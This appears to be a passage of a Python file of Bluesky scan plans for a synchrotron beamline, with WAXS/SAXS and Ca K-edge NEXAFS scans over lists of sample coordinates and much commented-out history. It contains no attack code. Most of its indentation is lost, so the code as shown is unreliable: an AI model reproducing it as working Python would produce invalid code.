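            sample_id(user_name=user_name,
                      sample_name=name_fmt.format(sam=sam, waxs='%2.1f' % wa))
            yield from bp.rel_scan(dets, piezo.y, *ypos)
    sample_id(user_name='test', sample_name='test')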
def ex_situ_hardxray_2020_3(t=1):
yield from bps.mv(stage.y, 0)
yield from bps.mv(stage.th, 0)
samples = ['F22_83','F22_84','F22_85','F23_86','F23_87','F23_88','F24_89','F24_90','F24_91','F24_92','F24_93','F24_94','F25_95','F25_96','F25_97','F25_98']
x_list = [45100, 38750, 33500, 26450, 21600, 17300, 7800, 3600, -2300, -7800, -13400, -18500, -28800, -32400, -36700, -42500]
y_list = [-1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500]
z_list = [ 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700]
# Detectors, motors:
dets = [pil1M, pil300KW]
waxs_range = np.linspace(0, 32.5, 6)
ypos = [0, 400, 3]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
det_exposure_time(t,t)
for wa in waxs_range:
yield from bps.mv(waxs, wa)
for sam, x, y, z in zip(samples, x_list, y_list, z_list):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from bps.mv(piezo.z, z)
name_fmt = '{sam}_wa{waxs}'
sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
sample_id(user_name='OS', sample_name=sample_name)
yield from bp.rel_scan(dets, piezo.y, *ypos)
sample_id(user_name='test', sample_name='test')
# det_exposure_time(0.3,0.3)
yield from bps.mv(stage.th, 1.5)
yield from bps.mv(stage.y, -11)
samples = ['E18_67','E18_68','E18_69','E19_70','E19_71','E19_72','E19_73','E19_74','E19_75','E20_76','E20_77','E20_78','E21_79','E21_80','E21_81','E22_82']
x_list = [43500, 37500, 32100, 23600, 18350, 13000, 7200, 3300, -450, -9400, -14300, -19400, -25900, -31300, -36200, -43200]
y_list = [-9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700]
z_list = [ 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200]
# Detectors, motors:
dets = [pil1M, pil300KW]
waxs_range = np.linspace(0, 32.5, 6)
ypos = [0, 400, 3]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
det_exposure_time(t,t)
for wa in waxs_range:
yield from bps.mv(waxs, wa)
for sam, x, y, z in zip(samples, x_list, y_list, z_list):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from bps.mv(piezo.z, z)
name_fmt = '{sam}_16.1keV_wa{waxs}'
sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
sample_id(user_name='OS', sample_name=sample_name)
yield from bp.rel_scan(dets, piezo.y, *ypos)
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3,0.3)
# def ex_situ_hardxray_2021_1(t=1):
# yield from bps.mv(stage.y, 0)
# yield from bps.mv(stage.th, 0)
# samples = ['F22_83','F22_84','F22_85','F23_86','F23_87','F23_88','F24_89','F24_90','F24_91','F24_92','F24_93','F24_94','F25_95','F25_96','F25_97','F25_98']
# x_list = [45100, 38750, 33500, 26450, 21600, 17300, 7800, 3600, -2300, -7800, -13400, -18500, -28800, -32400, -36700, -42500]
# y_list = [-1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500]
# z_list = [ 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700]
# # Detectors, motors:
# dets = [pil1M, pil300KW]
# waxs_range = np.linspace(0, 32.5, 6)
# ypos = [0, 400, 3]
# assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
# assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
# det_exposure_time(t,t)
# for wa in waxs_range:
# yield from bps.mv(waxs, wa)
# for sam, x, y, z in zip(samples, x_list, y_list, z_list):
# yield from bps.mv(piezo.x, x)
# yield from bps.mv(piezo.y, y)
# yield from bps.mv(piezo.z, z)
# name_fmt = '{sam}_wa{waxs}'
# sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
# sample_id(user_name='OS', sample_name=sample_name)
# yield from bp.rel_scan(dets, piezo.y, *ypos)
# sample_id(user_name='test', sample_name='test')
# # det_exposure_time(0.3,0.3)
# yield from bps.mv(stage.th, 1.5)
# yield from bps.mv(stage.y, -11)
# samples = ['E18_67','E18_68','E18_69','E19_70','E19_71','E19_72','E19_73','E19_74','E19_75','E20_76','E20_77','E20_78','E21_79','E21_80','E21_81','E22_82']
# x_list = [43500, 37500, 32100, 23600, 18350, 13000, 7200, 3300, -450, -9400, -14300, -19400, -25900, -31300, -36200, -43200]
# y_list = [-9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700]
# z_list = [ 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200]
# # Detectors, motors:
# dets = [pil1M, pil300KW]
# waxs_range = np.linspace(0, 32.5, 6)
# ypos = [0, 400, 3]
# assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
# assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
# det_exposure_time(t,t)
# for wa in waxs_range:
# yield from bps.mv(waxs, wa)
# for sam, x, y, z in zip(samples, x_list, y_list, z_list):
# yield from bps.mv(piezo.x, x)
# yield from bps.mv(piezo.y, y)
# yield from bps.mv(piezo.z, z)
# name_fmt = '{sam}_16.1keV_wa{waxs}'
# sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
# sample_id(user_name='OS', sample_name=sample_name)
# yield from bp.rel_scan(dets, piezo.y, *ypos)
# sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3,0.3)
def ex_situ_hardxray_2021_1(t=1):
yield from bps.mv(stage.th, 0)
yield from bps.mv(stage.y, 0)
# samples = ['P1_1', 'P1_2', 'P1_3', 'P2_1', 'P2_2', 'P2_3', 'P3_1', 'P3_2', 'P3_3', 'P4_1', 'P4_2', 'P4_3', 'P5_1', 'P5_2', 'P5_3',
# 'P6_1', 'P6_2', 'P6_3', 'P7_1', 'P7_2', 'P7_3', 'P8_1', 'P8_2', 'P8_3']
# x_list = [ 45400, 41100, 37500, 32400, 29400, 25900, 20200, 16700, 13100, 6800, 3700, 200, -4600, -8400, -12000, -17200, -20600,
# -24000, -29400, -33100, -36200, -40000, -42500, -45500]
# y_list = [ -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000,
# -3000, -3000, -3000, -3000, -3000, -3000, -3000]
# z_list = [ 4000, 4000, 4100, 4100, 4200, 4200, 4200, 4200, 4300, 4300, 4400, 4400, 4500, 4500, 4600, 4600, 4700,
# 4700, 4800, 4800, 4900, 4900, 5000, 5000]
samples = ['N1_1', 'N1_2', 'N1_3', 'N1_4', 'N2_1', 'N2_2', 'N2_3', 'N2_4', 'N3_1', 'N3_2', 'N3_3', 'N4_1', 'N4_2', 'N4_3', 'N5_1',
'N5_2', 'N5_3']
x_list = [ 45300, 41400, 38200, 34700, 29600, 26300, 22900, 18400, 7700, 3100, -1300, -9300, -14200, -19600, -28600, -35100, -41200]
y_list = [ -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500]
z_list = [ 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500]
# Detectors, motors:
dets = [pil1M, pil300KW]
waxs_range = np.linspace(0, 32.5, 6)
ypos = [0, 400, 3]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
det_exposure_time(t,t)
for wa in waxs_range:
yield from bps.mv(waxs, wa)
for sam, x, y, z in zip(samples, x_list, y_list, z_list):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from bps.mv(piezo.z, z)
name_fmt = '{sam}_wa{waxs}_sdd8.3m_16.1keV'
sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
sample_id(user_name='OS', sample_name=sample_name)
yield from bp.rel_scan(dets, piezo.y, *ypos)
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3,0.3)
# yield from bps.mv(stage.th, 2.5)
# yield from bps.mv(stage.y, -13)
# samples = ['R1_1', 'R1_2', 'R1_3', 'R2_1', 'R2_2', 'R2_3', 'R3_1', 'R3_2', 'R3_3', 'R4_1', 'R4_2', 'R4_3', 'R5_1', 'R5_2', 'R5_3']
# x_list = [ 44800, 40300, 34800, 24800, 18800, 12300, 4000, -1700, -7800, -13700, -20700, -27700, -33200, -38200, -43400]
# y_list = [ -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500]
# z_list = [ 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000]
# for wa in waxs_range:
# yield from bps.mv(waxs, wa)
# for sam, x, y, z in zip(samples, x_list, y_list, z_list):
# yield from bps.mv(piezo.x, x)
# yield from bps.mv(piezo.y, y)
# yield from bps.mv(piezo.z, z)
# name_fmt = '{sam}_wa{waxs}_sdd8.3m_16.1keV'
# sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
# sample_id(user_name='OS', sample_name=sample_name)
# yield from bp.rel_scan(dets, piezo.y, *ypos)
# sample_id(user_name='test', sample_name='test')
# det_exposure_time(0.3,0.3)
def run_saxs_nexafs(t=1):
yield from waxs_prep_multisample_nov(t=0.5)
# yield from bps.sleep(10)
# yield from nexafs_prep_multisample_nov(t=1)
def saxs_prep_multisample_nov(t=1):
dets = [pil1M]
energies = [4030, 4040, 4050, 4055, 4065, 4075, 4105]
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_pos{posi}_wa{wa}_xbpm{xbpm}'
waxs_range = [32.5]
ypos = [0, 400, 3]
for wa in waxs_range:
yield from bps.mv(waxs, wa)
yield from bps.mv(stage.th, 3.5)
yield from bps.mv(stage.y, -13)
# samples = ['K5-6', 'K5-5', 'K5-4', 'K5-3', 'K5-2', 'K5-1', 'K4-3', 'K4-2', 'K4-1', 'K3-3', 'K3-2', 'K3-1', 'K2-3', 'K2-2', 'K2-1', 'K1-3', 'K1-2', 'K1-1']
# x_list = [41400, 37700,34300,26750,23800,20600,1700,-2100,-5300,-10200,-14150,-19200,-27500,-32000,-37500,-41100,-45800,-49400]
# y_list = [-9500, -9500,-9500,-9500,-9500,-9500,-9500,-9500,-9500,-9500, -9500, -9500, -9500, -9500, -9500, -9500, -9700, -9500]
# z_list = [ 5500, 5500, 5400, 5300, 5200, 5100, 5000, 4900, 4800, 4700, 4600, 4500, 4400, 4300, 4200, 4100, 4000, 3900]
# samples = ['M14-1', 'M14-2', 'M14-3', 'M15-1', 'M15-2', 'M15-3', 'M16-1', 'M16-2', 'M16-3', 'M17-1', 'M17-2', 'M17-3', 'M18-1', 'M18-2', 'M18-3', 'M18-4', 'M18-5']
# x_list = [ 46900, 44500, 41500, 31900, 27300, 22750, 12750, 10500, 7800, -2800, -4900, -9100, -17400, -20800, -23800, -26550, -29950]
# y_list = [ -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8100, -8500, -8500, -8500, -8500, -8500, -8500, -8500]
# z_list = [ 4800, 4800, 4700, 4600, 4500, 4500, 4400, 4300, 4200, 4100, 4100, 4000, 3900, 3800, 3800, 3700, 3600]
samples = [ 'M16-2', 'M16-3', 'M17-1', 'M17-2', 'M17-3', 'M18-1', 'M18-2', 'M18-3', 'M18-4', 'M18-5']
x_list = [ 10500, 7800, -2800, -4900, -9100, -17400, -20800, -23800, -26550, -29950]
y_list = [ -8500, -8500, -8100, -8500, -8500, -8500, -8500, -8500, -8500, -8500]
z_list = [ 4300, 4200, 4100, 4100, 4000, 3900, 3800, 3800, 3700, 3600]
for x, y, z, name in zip(x_list, y_list, z_list, samples):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from bps.mv(piezo.z, z)
for k, e in enumerate(energies):
yield from bps.mv(energy, e)
yield from bps.sleep(3)
name_fmt = '{sample}_{energy}eV_5m_xbpm{xbpm}_wa{wa}'
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wa)
sample_id(user_name='OS', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.rel_scan(dets, piezo.y, *ypos)
yield from bps.mv(energy, 4080)
yield from bps.mv(energy, 4055)
yield from bps.mv(energy, 4030)
# for wa in waxs_range:
# yield from bps.mv(waxs, wa)
# yield from bps.mv(stage.y, 0)
# yield from bps.mv(stage.th, 0)
# samples = ['L13-3', 'L13-2', 'L13-1', 'L12-3', 'L12-2', 'L12-1', 'L11-3', 'L11-2', 'L11-1', 'L10-3', 'L10-2', 'L10-1', 'L9-3', 'L9-2', 'L9-1', 'L8-3', 'L8-2',
# 'L8-1', 'L7-3', 'L7-2', 'L7-1', 'L6-3', 'L6-2', 'L6-1']
# x_list = [40600, 37500, 34500, 29400, 25600, 22300, 17100, 14250, 10800, 5900, 3450, 550, -5050, -7250, -9100, -13900,-16200,-18500,-22300,-24700,-27050,
# -34800, -38450, -42250]
# y_list = [-1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000,
# -1000, -1000, -1000]
# z_list = [ 5400, 5400, 5300, 5200, 5100, 5000, 4900, 4800, 4700, 4600, 4500, 4400, 4300, 4200, 4100, 4000, 3900, 3800, 3700, 3600, 3500,
# 3300, 3400, 3300]
# assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
# assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
# assert len(x_list) == len(z_list), f'Number of X coordinates ({len(x_list)}) is different from number of z coord ({len(z_list)})'
# for x, y, z, name in zip(x_list, y_list, z_list, samples):
# yield from bps.mv(piezo.x, x)
# yield from bps.mv(piezo.y, y)
# yield from bps.mv(piezo.z, z)
# for k, e in enumerate(energies):
# yield from bps.mv(energy, e)
# yield from bps.sleep(3)
# name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_wa{wa}'
# sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wa)
# sample_id(user_name='OS', sample_name=sample_name)
# print(f'\n\t=== Sample: {sample_name} ===\n')
# yield from bp.rel_scan(dets, piezo.y, *ypos)
# yield from bps.mv(energy, 4080)
# yield from bps.mv(energy, 4055)
# yield from bps.mv(energy, 4030)
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3,0.3)
def waxs_prep_multisample_nov(t=1):
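    # WAXS series on pil300KW. Earlier sample sets are kept below as
    # commented-out history; only the 'Ca2' position is currently active.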
dets = [pil300KW]
energies = [4030, 4040, 4050, 4055, 4065, 4075, 4105]
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_pos{posi}_wa{wa}_xbpm{xbpm}'
waxs_range = [0, 6.5, 13.0, 19.5, 26, 32.5, 39.0, 45.5]
ypos = [0, 400, 3]
# for wa in waxs_range:
# yield from bps.mv(waxs, wa)
# yield from bps.mv(stage.th, 3.5)
# yield from bps.mv(stage.y, -13)
# # samples = ['K5-6', 'K5-5', 'K5-4', 'K5-3', 'K5-2', 'K5-1', 'K4-3', 'K4-2', 'K4-1', 'K3-3', 'K3-2', 'K3-1', 'K2-3', 'K2-2', 'K2-1', 'K1-3', 'K1-2', 'K1-1']
# # x_list = [41400, 37700,34300,26750,23800,20600,1700,-2100,-5300,-10200,-14150,-19200,-27500,-32000,-37500,-41100,-45800,-49400]
# # y_list = [-9500, -9500,-9500,-9500,-9500,-9500,-9500,-9500,-9500,-9500, -9500, -9500, -9500, -9500, -9500, -9500, -9700, -9500]
# # z_list = [ 5500, 5500, 5400, 5300, 5200, 5100, 5000, 4900, 4800, 4700, 4600, 4500, 4400, 4300, 4200, 4100, 4000, 3900]
# samples = ['M14-1', 'M14-2', 'M14-3', 'M15-1', 'M15-2', 'M15-3', 'M16-1', 'M16-2', 'M16-3', 'M17-1', 'M17-2', 'M17-3', 'M18-1', 'M18-2', 'M18-3', 'M18-4', 'M18-5']
# x_list = [ 46900, 44500, 41500, 31900, 27300, 22750, 12750, 10500, 7800, -2800, -4900, -9100, -17400, -20800, -23800, -26550, -29950]
# y_list = [ -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8100, -8500, -8500, -8500, -8500, -8500, -8500, -8500]
# z_list = [ 4800, 4800, 4700, 4600, 4500, 4500, 4400, 4300, 4200, 4100, 4100, 4000, 3900, 3800, 3800, 3700, 3600]
# for x, y, z, name in zip(x_list, y_list, z_list, samples):
# yield from bps.mv(piezo.x, x)
# yield from bps.mv(piezo.y, y)
# yield from bps.mv(piezo.z, z)
# for k, e in enumerate(energies):
# yield from bps.mv(energy, e)
# yield from bps.sleep(3)
# name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_wa{wa}'
# sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wa)
# sample_id(user_name='OS', sample_name=sample_name)
# print(f'\n\t=== Sample: {sample_name} ===\n')
# yield from bp.rel_scan(dets, piezo.y, *ypos)
# yield from bps.mv(energy, 4080)
# yield from bps.mv(energy, 4055)
# yield from bps.mv(energy, 4030)
# energies = [4030, 4040, 4050, 4055, 4065, 4075, 4105]
# waxs_range = [0, 6.5, 13.0, 19.5, 26, 32.5, 39.0, 45.5]
# for wa in waxs_range:
# yield from bps.mv(waxs, wa)
# yield from bps.mv(stage.y, 0)
# yield from bps.mv(stage.th, 0)
# # samples = ['L13-3', 'L13-2', 'L13-1', 'L12-3', 'L12-2', 'L12-1', 'L11-3', 'L11-2', 'L11-1', 'L10-3', 'L10-2', 'L10-1', 'L9-3', 'L9-2', 'L9-1', 'L8-3', 'L8-2',
# # 'L8-1', 'L7-3', 'L7-2', 'L7-1', 'L6-3', 'L6-2', 'L6-1']
# # x_list = [40600, 37500, 34500, 29400, 25600, 22300, 17100, 14250, 10800, 5900, 3450, 550, -5050, -7250, -9100, -13900,-16200,-18500,-22300,-24700,-27050,
# # -34800, -38450, -42250]
# # y_list = [-1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000,
# # -1000, -1000, -1000]
# # z_list = [ 5400, 5400, 5300, 5200, 5100, 5000, 4900, 4800, 4700, 4600, 4500, 4400, 4300, 4200, 4100, 4000, 3900, 3800, 3700, 3600, 3500,
# # 3300, 3400, 3300]
# samples = [ 'P1', 'P2', 'E1', 'E2', 'PG1', 'PG2']
# x_list = [11400, 6200, 200, -5200, -13200, -26200]
# y_list = [-1000, -900, -900, -700, -1300, -1300]
# z_list = [ 4500, 4300, 4200, 4100, 4000, 4000]
# assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
# assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
# assert len(x_list) == len(z_list), f'Number of X coordinates ({len(x_list)}) is different from number of z coord ({len(z_list)})'
# for x, y, z, name in zip(x_list, y_list, z_list, samples):
# yield from bps.mv(piezo.x, x)
# yield from bps.mv(piezo.y, y)
# yield from bps.mv(piezo.z, z)
# for k, e in enumerate(energies):
# yield from bps.mv(energy, e)
# yield from bps.sleep(3)
# name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_wa{wa}'
# sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wa)
# sample_id(user_name='OS', sample_name=sample_name)
# print(f'\n\t=== Sample: {sample_name} ===\n')
# yield from bp.rel_scan(dets, piezo.y, *ypos)
# yield from bps.mv(energy, 4080)
# yield from bps.mv(energy, 4055)
# yield from bps.mv(energy, 4030)
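    # Non-uniform energy grid for the edge scan: 5 eV steps below 4040 eV,
    # fine 0.5 eV steps across 4040-4060 eV (Ca K-edge region), 2 eV steps
    # to 4080 eV, then 5 eV steps up to 4150 eV.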
energies = np.arange(4030, 4040, 5).tolist() + np.arange(4040, 4060, 0.5).tolist() + np.arange(4060, 4080, 2).tolist() + np.arange(4080, 4150, 5).tolist()
# waxs_range = [0, 6.5, 13.0, 19.5, 26, 32.5, 39.0, 45.5]
waxs_range = [6.5]
for wa in waxs_range:
yield from bps.mv(waxs, wa)
yield from bps.mv(stage.y, 0)
yield from bps.mv(stage.th, 0)
# samples = [ 'U1', 'U2', 'Ca1', 'Ca2']
# x_list = [43000, 31000, -36500, -44000]
# y_list = [ -700, -700, -900, -900]
# z_list = [ 4600, 4600, 3600, 3600]
samples = [ 'Ca2']
x_list = [ -44000]
y_list = [ -900]
z_list = [ 3600]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
assert len(x_list) == len(z_list), f'Number of X coordinates ({len(x_list)}) is different from number of z coord ({len(z_list)})'
for x, y, z, name in zip(x_list, y_list, z_list, samples):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from bps.mv(piezo.z, z)
for k, e in enumerate(energies):
yield from bps.mv(energy, e)
yield from bps.sleep(3)
name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_wa{wa}'
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wa)
sample_id(user_name='OS', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.rel_scan(dets, piezo.y, *ypos)
yield from bps.mv(energy, 4120)
yield from bps.mv(energy, 4090)
yield from bps.mv(energy, 4060)
yield from bps.mv(energy, 4030)
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3,0.3)
def nexafs_prep_multisample_nov(t=1):
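    # Tilt the stage, then visit each sample position and hand off to
    # NEXAFS_Ca_edge_multi for the actual energy scan.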
# samples = ['K5-6', 'K5-5', 'K5-4', 'K5-3', 'K5-2', 'K5-1', 'K4-3', 'K4-2', 'K4-1', 'K3-3', 'K3-2', 'K3-1', 'K2-3', 'K2-2', 'K2-1', 'K1-3', 'K1-2', 'K1-1']
# x_list = [41400, 37700, 34300, 26750, 23800, 20600, 1700, -2100, -5300, -10200,-14150,-19200,-27500,-32000,-37500,-41100,-45800,-49400]
    # y_list = [-9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9700, -9500]
# z_list = [ 5500, 5500, 5400, 5300, 5200, 5100, 5000, 4900, 4800, 4700, 4600, 4500, 4400, 4300, 4200, 4100, 4000, 3900]
yield from bps.mv(stage.th, 3.5)
yield from bps.mv(stage.y, -13)
samples = ['M14-1', 'M14-2', 'M14-3', 'M15-1', 'M15-2', 'M15-3', 'M16-1', 'M16-2', 'M16-3', 'M17-1', 'M17-2', 'M17-3', 'M18-1', 'M18-2', 'M18-3', 'M18-4', 'M18-5']
x_list = [ 46900, 44500, 41500, 31900, 27300, 22750, 12750, 10500, 7800, -2800, -4900, -9100, -17400, -20800, -23800, -26550, -29950]
y_list = [ -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8100, -8500, -8500, -8500, -8500, -8500, -8500, -8500]
z_list = [ 4800, 4800, 4700, 4600, 4500, 4500, 4400, 4300, 4200, 4100, 4100, 4000, 3900, 3800, 3800, 3700, 3600]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
    assert len(x_list) == len(z_list), f'Number of X coordinates ({len(x_list)}) is different from number of z coord ({len(z_list)})'
for x, y, z, name in zip(x_list, y_list, z_list, samples):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from bps.mv(piezo.z, z)
yield from NEXAFS_Ca_edge_multi(t=t, name=name)
yield from bps.mv(stage.y, 0)
yield from bps.mv(stage.th, 0)
# samples = ['L13-3', 'L13-2', 'L13-1', 'L12-3', 'L12-2', 'L12-1', 'L11-3', 'L11-2', 'L11-1', 'L10-3', 'L10-2', 'L10-1', 'L9-3', 'L9-2', 'L9-1', 'L8-3', 'L8-2',
# 'L8-1', 'L7-3', 'L7-2', 'L7-1', 'L6-3', 'L6-2', 'L6-1']
# x_list = [40600, 37500, 34500, 29400, 25600, 22300, 17100, 14250, 10800, 5900, 3450, 550, -5050, -7250, -9100, -13900,-16200,-18500,-22300,-24700,-27050,
# -34800, -38450, -42250]
# y_list = [-1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000,
# -1000, -1000, -1000]
# z_list = [ 5400, 5400, 5300, 5200, 5100, 5000, 4900, 4800, 4700, 4600, 4500, 4400, 4300, 4200, 4100, 4000, 3900, 3800, 3700, 3600, 3500,
# 3300, 3400, 3300]
samples = [ 'C1', 'C2', 'P1', 'P2', 'E1', 'E2', 'PG1', 'PG2']
x_list = [21800, 16500, 11400, 6200, 200, -5200, -13200, -26200]
y_list = [ -900, -700, -800, -700, -700, -500, -1100, -1100]
z_list = [ 4600, 4600, 4500, 4300, 4200, 4100, 4000, 4000]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
assert len(x_list) == len(z_list), f'Number of X coordinates ({len(x_list)}) is different from number of z coord ({len(z_list)})'
for x, y, z, name in zip(x_list, y_list, z_list, samples):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from bps.mv(piezo.z, z)
yield from NEXAFS_Ca_edge_multi(t=t, name=name)
# sample_id(user_name='test', sample_name='test')
# yield from bps.mv(att2_11, 'Insert')
# yield from bps.mv(GV7.open_cmd, 1 )
# yield from bps.sleep(2)
# yield from bps.mv(att2_11, 'Insert')
# yield from bps.mv(GV7.open_cmd, 1 )
def NEXAFS_Ca_edge_multi(t=0.5, name='test'):
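    # Ca K-edge NEXAFS: step the energy from 4030 to 4150 eV in 1 eV
    # increments, settle, tag the Amptek filename, and take one count per
    # point before walking the energy back down.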
yield from bps.mv(waxs, 52)
dets = [pil300KW]
energies = np.linspace(4030, 4150, 121)
det_exposure_time(t,t)
name_fmt = 'nexafs_{sample}_{energy}eV_xbpm{xbpm}'
for e in energies:
yield from bps.mv(energy, e)
yield from bps.sleep(3)
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
RE.md['filename_amptek'] = sample_name
sample_id(user_name='OS', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 4125)
yield from bps.mv(energy, 4100)
yield from bps.mv(energy, 4075)
yield from bps.mv(energy, 4050)
yield from bps.mv(energy, 4030)
sample_id(user_name='test', sample_name='test')
53.90785 | 173 | 0.548465 | 4,903 | 31,590 | 3.39486 | 0.10157 | 0.073536 | 0.085792 | 0.093361 | 0.888735 | 0.87696 | 0.869631 | 0.865665 | 0.855933 | 0.851066 | 0 | 0.274304 | 0.264419 | 31,590 | 585 | 174 | 54 | 0.442011 | 0.517221 | 0 | 0.663636 | 0 | 0.045455 | 0.173128 | 0.017319 | 0 | 0 | 0 | 0 | 0.077273 | 1 | 0.036364 | false | 0 | 0 | 0 | 0.036364 | 0.013636 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8
